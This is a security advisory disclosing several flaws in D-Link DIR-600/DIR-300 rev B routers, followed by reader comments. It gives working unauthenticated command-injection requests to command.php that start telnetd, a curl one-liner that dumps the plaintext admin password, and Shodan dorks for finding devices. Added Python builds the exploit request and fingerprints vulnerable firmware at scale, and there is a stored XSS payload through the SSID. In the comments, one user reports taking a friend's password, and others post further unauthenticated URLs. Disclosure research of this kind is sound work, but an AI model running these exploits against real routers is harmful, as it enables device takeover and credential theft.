
Multiple Vulnerabilities in D-Link DIR-600 and DIR-300 (rev B)

Device Name: DIR-600 / DIR-300 - HW rev B1
Vendor: D-Link

============ Vulnerable Firmware Releases - DIR-300: ============

Firmware Version : 2.12 - 18.01.2012
Firmware Version : 2.13 - 07.11.2012

============ Vulnerable Firmware Releases - DIR-600: ============

Firmware Version : 2.12b02 - 17.01.2012
Firmware Version : 2.13b01 - 07.11.2012
Firmware Version : 2.14b01 - 22.01.2013

============ Device Description: ============

D-Link® introduces the Wireless 150 Router (DIR-600), which delivers high performance end-to-end wireless connectivity based on 802.11n technology. The DIR-600 provides better wireless coverage and improved speeds over standard 802.11g*. Upgrading your home network to Wireless 150 provides an excellent solution for experiencing better wireless performance while sharing a broadband Internet connection with multiple computers over a secure wireless network.

Source (dead): http://www.dlink.com/us/en/support/product/dir-600-wireless-n-150-home-r...
German website: http://www.dlink.de/cs/Satellite?c=TechSupport_C&childpagename=DLinkEuro...

============ Shodan Dorks ============

Shodan search:
Server: Linux, HTTP/1.1, DIR-300
Server: Linux, HTTP/1.1, DIR-600

============ Vulnerability Overview: ============

  • OS Command Injection (unauthenticated)

=> Parameter: cmd (POST to /command.php)

The vulnerability is caused by missing access restrictions on command.php and missing input validation of the cmd parameter. It can be exploited to inject and execute arbitrary shell commands on the device.
One use of it is to start a telnetd and take over the device.

WARNING: You do not need to be authenticated to the device!


starting a telnet server:

Request:
POST /command.php HTTP/1.1
Host: 192.168.178.222
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.178.222/
Content-Length: 15
Cookie: uid=hfaiGzkB4z
Pragma: no-cache
Cache-Control: no-cache

cmd=telnetd;

You do not need to be authenticated to the device to execute the injected commands: the whole request can be prepared in advance and sent without any authentication details (the uid cookie in the request above is not required either).

For example, you could start the telnetd on other ports and interfaces, and with this you get a full shell on the device *h00ray*

Nmap Scan after starting the telnetd:
Nmap scan report for 192.168.178.222
Host is up (0.022s latency).
Not shown: 995 closed ports
PORT      STATE    SERVICE VERSION
1/tcp     filtered tcpmux
23/tcp    open     telnet  BusyBox telnetd 1.14.1 <<==!!!
<snip>


  • Information disclosure:

Nice server banner to detect this type of devices easily:

Server: Linux, HTTP/1.1, DIR-300 Ver 2.12
Server: Linux, HTTP/1.1, DIR-600 Ver 2.12

  • Changing the password does not require the current password

The password change form does not ask for the current password, so an attacker who has access to an authenticated browser session can set a new password without knowing the old one.

  • Insecure Cryptographic Storage:

There is no password hashing implemented and so it is saved in plain text on the system:

# cat var/passwd
"admin" "test" "0"

Positive Technologies released an advisory on this in 2011 and D-Link fixed it at the time:
http://en.securitylab.ru/lab/PT-2011-30
In the current firmware versions the password is once again stored in plaintext.

Combining the plaintext credential storage with the unauthenticated OS command injection gives the following one-liner, which extracts the admin password from every vulnerable device:

root@bt:~# curl --data "cmd=cat /var/passwd" http://<Target IP>/command.php
"admin" "THESECRETPASS" "0"
root@bt:~#
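As an added example (not from the advisory and not the author's tooling), the following Python builds the same unauthenticated POST to command.php as the curl one-liner above, classifies the device's reply (a 404, as reported in the comments for firmware 2.10, means command.php is absent), and parses the quoted-field format of /var/passwd. It assumes that the body of a successful reply is the raw command output and that the third field of /var/passwd is a privilege level; the two sample replies are constructed from the headers shown on this page.

```python
"""Added example (not the advisory's or D-Link's code): build the
unauthenticated command.php request, classify the reply, and parse
/var/passwd.  Assumptions: a successful reply carries the raw command
output in its body; the third /var/passwd field is a privilege level."""

import shlex
from urllib.parse import quote_plus

COMMAND_PATH = "/command.php"


def build_command_request(host: str, cmd: str) -> bytes:
    """Raw HTTP/1.1 POST equivalent to: curl --data "cmd=<cmd>" http://host/command.php
    No cookie or credentials: the advisory's author confirms the uid cookie is unneeded."""
    body = "cmd=" + quote_plus(cmd)  # form-encode the command (space -> '+', ';' -> %3B)
    headers = [
        f"POST {COMMAND_PATH} HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body)}",
        "Connection: close",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n" + body).encode()


def parse_http_response(raw: bytes):
    """Split a raw HTTP response into (status code, lower-cased headers, body text)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body.decode("latin-1")


def parse_passwd(text: str):
    """Parse lines of the form  "user" "password" "level"  (double-quoted, space separated)."""
    entries = []
    for line in text.splitlines():
        try:
            fields = shlex.split(line)  # shlex handles the quoting; a quote inside a password breaks it
        except ValueError:
            continue                    # unbalanced quotes: skip the line rather than crash
        if len(fields) >= 3:
            entries.append({"user": fields[0], "password": fields[1], "level": fields[2]})
    return entries


def classify(raw_response: bytes) -> str:
    """Map a reply to the /var/passwd request onto the outcomes seen on this page."""
    status, headers, body = parse_http_response(raw_response)
    banner = headers.get("server", "")
    if status == 404:
        return f"not vulnerable: command.php absent ({banner})"
    if status == 200 and parse_passwd(body):
        return f"vulnerable: unauthenticated command execution, credentials recovered ({banner})"
    return f"unclassified: status {status} ({banner})"


# Constructed sample replies, modelled on the headers shown in the advisory and comments.
REPLY_FW210 = (b"HTTP/1.1 404 Not Found\r\n"
               b"Server: Linux, HTTP/1.1, DIR-600 Ver 2.10\r\n"
               b"Content-Type: text/html\r\n"
               b"Content-Length: 13\r\n\r\n"
               b"404 Not Found")
REPLY_FW214 = (b"HTTP/1.1 200 OK\r\n"
               b"Server: Linux, HTTP/1.1, DIR-600 Ver 2.14\r\n"
               b"Content-Length: 28\r\n\r\n"
               b'"admin" "THESECRETPASS" "0"\n')

if __name__ == "__main__":
    print(build_command_request("192.168.178.222", "cat /var/passwd").decode())
    for reply in (REPLY_FW210, REPLY_FW214):
        print(classify(reply))
```

The request builder sends nothing but the form body, which is the whole point of the finding; the classifier keeps the Server banner in its verdict so a scan over many hosts records which firmware answered.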

  • Information Disclosure:

Detailed device information including Model Name, Hardware Version, Linux Kernel, Firmware version, Language and MAC Addresses are available via the network.

Request:

http://Target-IP/DevInfo.txt

or try to access version.txt and have a look at the html source ;)

Response:

HTTP/1.1 200 OK
Server: Linux, HTTP/1.1, DIR-600 Ver 2.14
Date: Fri, 31 Dec 1999 18:04:13 GMT
Content-Length: 267

Firmware External Version: V2.14
Firmware Internal Version: d1mg
Model Name: DIR-600
Hardware Version: Bx
WLAN Domain: 826
Kernel: 2.6.33.2
Language: en
Graphcal Authentication: Disable
LAN MAC: <snip>
WAN MAC: <snip>
WLAN MAC: <snip>

These details are available without authentication.
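The banner disclosure above and the DevInfo.txt disclosure together give an unauthenticated fingerprint of the device. As an added example (not the advisory's code), the following Python parses both, normalises the version string and looks it up in the firmware lists at the top of this advisory. The DevInfo sample is constructed from the response shown above with placeholder MAC addresses; the version lookup only covers the versions the advisory lists, and the comments on this page report other versions (2.06, 2.11) as affected too.

```python
"""Added example (not the advisory's code): fingerprint a DIR-300/DIR-600
from the unauthenticated Server banner and DevInfo.txt, and look the firmware
version up in the version lists at the top of this advisory.  The DevInfo
sample is constructed from the response shown above with placeholder MACs."""

import re

# Firmware versions listed as vulnerable in this advisory (DIR-600 build suffixes
# like "b01" dropped).  Comments on the page report 2.06 and 2.11 as affected and
# 2.10 returning 404 for command.php; those are deliberately not encoded here.
LISTED_VULNERABLE = {
    "DIR-300": {"2.12", "2.13"},
    "DIR-600": {"2.12", "2.13", "2.14"},
}

BANNER_RE = re.compile(r"Server:\s*Linux,\s*HTTP/1\.1,\s*(DIR-\d+)(?:\s+Ver\s+(\S+))?")
MAC_RE = re.compile(r"^([0-9A-Fa-f]{2}[:-]){5}[0-9A-Fa-f]{2}$")


def parse_banner(server_header: str):
    """'Server: Linux, HTTP/1.1, DIR-600 Ver 2.14' -> {'model': 'DIR-600', 'version': '2.14'}"""
    m = BANNER_RE.search(server_header)
    return {"model": m.group(1), "version": m.group(2)} if m else None


def parse_devinfo(text: str) -> dict:
    """Parse the 'Key: value' lines of DevInfo.txt (split on the first colon only,
    so MAC addresses keep their colons)."""
    info = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            info[key.strip()] = value.strip()
    return info


def normalise_version(v):
    """'V2.14', '2.14b01', '2.12' -> '2.14', '2.14', '2.12'; None if unparseable."""
    m = re.match(r"[vV]?(\d+\.\d+)", v or "")
    return m.group(1) if m else None


def assess(server_header: str, devinfo_text: str = None) -> dict:
    """Combine banner and DevInfo.txt into a fingerprint plus a lookup against the list."""
    banner = parse_banner(server_header) or {}
    model = banner.get("model")
    version = normalise_version(banner.get("version"))
    hardware, macs = None, []
    if devinfo_text:
        info = parse_devinfo(devinfo_text)
        model = info.get("Model Name", model)
        version = normalise_version(info.get("Firmware External Version")) or version
        hardware = info.get("Hardware Version")
        macs = [k for k, v in info.items() if k.endswith("MAC") and MAC_RE.match(v)]
    return {
        "model": model,
        "version": version,
        "hardware": hardware,
        "exposed_macs": macs,  # which MAC addresses the unauthenticated page leaks
        "listed_vulnerable": version in LISTED_VULNERABLE.get(model, set()),
    }


# Constructed sample, modelled on the DevInfo.txt response above (MACs are placeholders).
DEVINFO_SAMPLE = """Firmware External Version: V2.14
Firmware Internal Version: d1mg
Model Name: DIR-600
Hardware Version: Bx
WLAN Domain: 826
Kernel: 2.6.33.2
Language: en
Graphcal Authentication: Disable
LAN MAC: 00:11:22:33:44:55
WAN MAC: 00:11:22:33:44:56
WLAN MAC: 00:11:22:33:44:57
"""

if __name__ == "__main__":
    print(assess("Server: Linux, HTTP/1.1, DIR-600 Ver 2.14", DEVINFO_SAMPLE))
    print(assess("Server: Linux, HTTP/1.1, DIR-600 Ver 2.10"))
```

DevInfo.txt takes precedence over the banner when both are available, because the banner only carries the major.minor version while DevInfo also gives the hardware revision, which matters here since the advisory covers rev B only.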

  • Local path disclosure

Every piece of information is useful to an attacker. This request reveals some more details about the operating system and its file system paths:

Request:

http://<IP>/router_info.xml

Response:
HTTP/1.1 200 OK
Server: Linux, HTTP/1.1, DIR-300 Ver 2.12
Date: Sat, 01 Jan 2000 21:22:43 GMT
Content-Type: text/xml
Content-Length: 49

EPHP: dophp(load,/htdocs/widget/.xml) ERROR (-1)

  • Stored XSS via WLAN Assistent and Version Details

Injecting scripts into the parameter SSID shows that this parameter is not properly validated for malicious input.

=> Parameter: SSID

The injected code is executed whenever version.txt is accessed, and accessing it does not require authentication :)

http://Target-IP/version.txt
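As an added example (not code from the D-Link firmware), the following Python shows the two controls that would have stopped this stored XSS, and why only one of them actually works. The version-page template is an assumption, since the advisory does not show the real version.txt markup; the 32-octet SSID limit comes from IEEE 802.11.

```python
"""Added example, not code from the D-Link firmware: the two controls that
would have stopped the stored XSS above.  The version-page template is an
assumption (the advisory does not show the real version.txt markup); the
32-octet SSID limit is from IEEE 802.11."""

import html

SSID_MAX_OCTETS = 32

# Assumed shape of the unauthenticated page that echoes the SSID (constructed).
VERSION_PAGE = "<html><body><div>Model: {model}</div><div>SSID: {ssid}</div></body></html>"


def validate_ssid(ssid: str) -> str:
    """Input validation at the WLAN assistant: enforce what an SSID can be.
    This does NOT stop a script payload, which fits comfortably in 32 octets."""
    if not 0 < len(ssid.encode("utf-8")) <= SSID_MAX_OCTETS:
        raise ValueError("SSID must be 1..32 octets")
    if any(ch in ssid for ch in "\x00\r\n"):
        raise ValueError("SSID contains control characters")
    return ssid


def render_version_unsafe(model: str, ssid: str) -> str:
    """What the device effectively does: the stored SSID is dropped into HTML verbatim."""
    return VERSION_PAGE.format(model=model, ssid=ssid)


def render_version_safe(model: str, ssid: str) -> str:
    """Output encoding at the point of rendering: the actual fix for stored XSS."""
    return VERSION_PAGE.format(model=html.escape(model, quote=True),
                               ssid=html.escape(ssid, quote=True))


PAYLOAD = "<script>alert(1)</script>"  # 25 octets: passes the SSID length check

if __name__ == "__main__":
    ssid = validate_ssid(PAYLOAD)
    print(render_version_unsafe("DIR-600", ssid))
    print(render_version_safe("DIR-600", ssid))
```

The length check is worth having, but it is not the fix: every page that echoes the SSID (version.txt here, the WLAN assistant, any status page) has to HTML-encode it at render time.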

============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de/m1adv2013-003
Video: http://www.s3cur1ty.de/home-network-horror-days

============ Time Line: ============

14.12.2012 - discovered vulnerability
14.12.2012 - contacted D-Link with the new vulnerability details via web interface
20.12.2012 - contacted Heise Security with details and Heise Security forwarded the details to D-Link
21.12.2012 - D-Link responded that they will check the findings *h00ray*
11.01.2013 - requested status update
25.01.2013 - requested status update
25.01.2013 - D-Link responded that this is a security problem of the user and/or browser and they will not provide a fix. Quite interesting but ok ...
25.01.2013 - I gave more details and as much input as possible so they can evaluate the vulnerabilities better
04.02.2013 - no more responses from D-Link, public release

===================== Advisory end =====================

Comments

Any idea how to make it work in 2.10?

Any idea how to make it work in 2.10? command.php is not found:
404 Not Found

2.10 Vulnerability

Does anyone know how I can use this vulnerability on a DIR-600 with firmware 2.10?

newbie question

I'm really a noob on the subject, but how can I recover the password of a DIR-600? I already tried all the default passwords but I think my brother changed it. The problem is he's travelling, the modem is in his room and it's locked, and I think somebody is stealing my connection. ty

D-link router_info.xml (and other interesting things)

Someone has shared a link with more stuff around the information disclosure vulnerability. I can't remember who sent me the link ... but thx a lot :)

http://www.shulerent.com/2011/04/02/d-link-router_info-xml-and-other-int...

have phun
mIke

x

Can it be used via CSRF (img src=command.php?cmd=xxx or AJAX)?
If yes, one could open telnet on WAN interface.

telnetd is running by default

so there is no need to start it ....

see my comment below

Re: telnetd is running by default

It is just one example of what you can do without authentication. It looks like the started telnetd depends on the exact firmware version. On my system it was not started out of the box.

Best,
mIke

telnetd in dir-600 fw 2.15DE

I got this via trial and error and I also decompressed the latest firmware image:

busybox init starts etc/init.d/rcS starts /etc/init0.d/rcS starts /etc/init0.d/S80telnetd.sh

always.

Can't post any code, your system says:
"We have detected malicious input and blocked your attempt."


md5sum DIR-600_fw_revb5_215b01_ALL_de_20130206.zip
bd9e98fcc45d511e11863d16b7b2a433

md5sum DIR-600_fw_revb5_215b01_ALL_de_20130206/DIR600B5_FW215WWb01.bin
d482c521cfb9d3384598f1b30cf7e4d

Re: telnetd in dir-600 fw 2.15DE

thx for your info. I have not checked the 2.15 but the telnet backdoor is included in lots of D-Link devices.

Best,
mIke

telnetd backdoor

The telnetd was already running on my DIR-600 device.

After the fw update v2.15, the telnetd is still started with a hardcoded login.

Even with the latest firmware it is very easy to get in.

There seems no way to disable this via the web interface.

Interesting..

I found a similar exploit for D-Link's DAP-1350, which is OEM Cameo. The same Ralink firmware is used by a handful of other vendors, including Netgear and Trendnet.

Considering vendors are often unwilling to fix these "user and/or browser" exploits, or even respond to emails.. more people will become interested in projects like openwrt and/or zrouter.

http://devio.us/~brynet/DAP-1350_exploit.txt

Firmware Rev. A 1.05 is also affected

Checked with Linux.
Searched for a second on Google and a minute later I had a telnet server running on the host without needing any password.
Installing a secure firewall on Layer 7 will help, I guess:
http://www.ranum.com/security/computer_security/index.html

BR
ITBungler

Version 2.11

Hello,

it seems to work on a D-Link DIR-300 ver. 2.11 too.

I was able to get the admin password from a friend's router through the
"plaintext credential vulnerability with the unauthenticated os command injection" and logged in successfully to the web interface, which was reachable over the internet ... !

cant believe this ...

Have a nice day

what about the other DIR-6##?

Is only the DIR-600 vulnerable or also the other DIR-6## (DIR-615, DIR-625 and DIR-635)?

Re: what about the other DIR-6##?

stay tuned ... I will release some more vulns like this

Similar exploit in DIR-685

I thought you might be interested in a similar vulnerability I found in the DIR-685 and wrote about in the October 2011 issue of Linux Journal and gave a talk on here: http://greenfly.org/talks/security/practice_hacking.html

The main difference is in my case the page is tools_vct.php and the variable is 'exeshell' but you can run telnetd as root all the same.

Re: Similar exploit in DIR-685

very cool ... but I think you need to be authenticated?!?

I think I have detected the same vuln in other D-Link devices ... cool to see this also in some more (broken) devices. I will publish this stuff soon ...

btw. cool work :)

Can't reproduce with DIR-300

Can't reproduce with DIR-300 running firmware 2.04, hardware revision B1 and the device is saying that no newer firmware version is available. Response is just a 404.

Re: Can't reproduce with DIR-300

This is because the automatic firmware check is broken ;) You have to update your router manually ...

btw. 404 is good :)

Good thing I threw them out after the PS event in HBN.

Hi,

after your demo in Heilbronn I had already thrown them out and replaced them with Netgear. But are those any better?

(And even Heise is talking about it ;-) )

Very nicely done.

Regards
Christian G. (from Hamburg)

uid Cookie

Your request contained a Cookie named uid containing some random string. Is this value required or some kind of authentication?

Re: uid

you do not need this Cookie :)

After executing I get this

After executing I get this :

HTTP/1.1 404 Not Found
Server: Linux, HTTP/1.1, DIR-600 Ver 2.10
Date: Wed, 06 Feb 2013 19:05:28 GMT
Content-Type: text/html
Content-Length: 110
Connection: close

404 Not Found
404 Not Found
The resource requested could not be found on this server.

Does that mean I am not vulnerable, or did I just do something wrong?

Re: After executing I get this

so you are not vulnerable to this attack

exploit

is there any exploit that works on 2.10 fw? I also have this and I get the same response!

fw 2.10

But does this version not have any bug?

nice

and without metasploit ;)

greetings

mr_insecure

Metasploit Module is coming

coming soon ... stay tuned ;)

DOS

Hello Mr. Messner,

as an addition I can say that a few months ago I was able to crash the http daemon on a DIR300 within seconds by simple fuzzing. Unfortunately I don't remember offhand the firmware version etc., but if there is interest I'd gladly write it up again.

Kind regards
M.Bilal

Re: DOS

I can well imagine that. Further information would certainly be interesting at this point.

Regards

what about hardware version A1 dir-300

is it safe to use the DIR-300 with

hardware version A1 and firmware 1.05??

thanks

setmo

Re: what about hardware version A1 dir-300

within the next few days we are also going to release vulnerabilities in HW rev A

stay tuned

Re: what about hardware version A1 dir-300

D-Link is now talking with me and is on the way to fixing the reported vulns. In the meantime I will not release more D-Link vulnerabilities ...

The same in fw 2.06 on DIR-300

Detailed device information including Model Name, Hardware Version, Linux Kernel, Firmware version, Language and MAC Addresses is also available (without any authentication) on:
Firmware External Version: V2.06
Firmware Internal Version: c61n
Model Name: DIR-300
Hardware Version: B1
Greets from Poland

RE:

Check out this site for HW rev_A and FW 1.05 and below:
http://www.securityfocus.com/archive/1/514687/30/120/threaded

WLAN password

The same trick allows to directly obtain the WLAN password (DIR-300, Rev A):
http://192.168.XXX.1/bsc_wlan.php?NO_NEED_AUTH=1
immediately shows the password in plain text. No authentication required.

Re: WLAN password

Thx to Craig, I think this vulnerability has been around the net for quite a while:
http://www.devttys0.com/2010/12/multiple-d-link-router-vulnerabilities/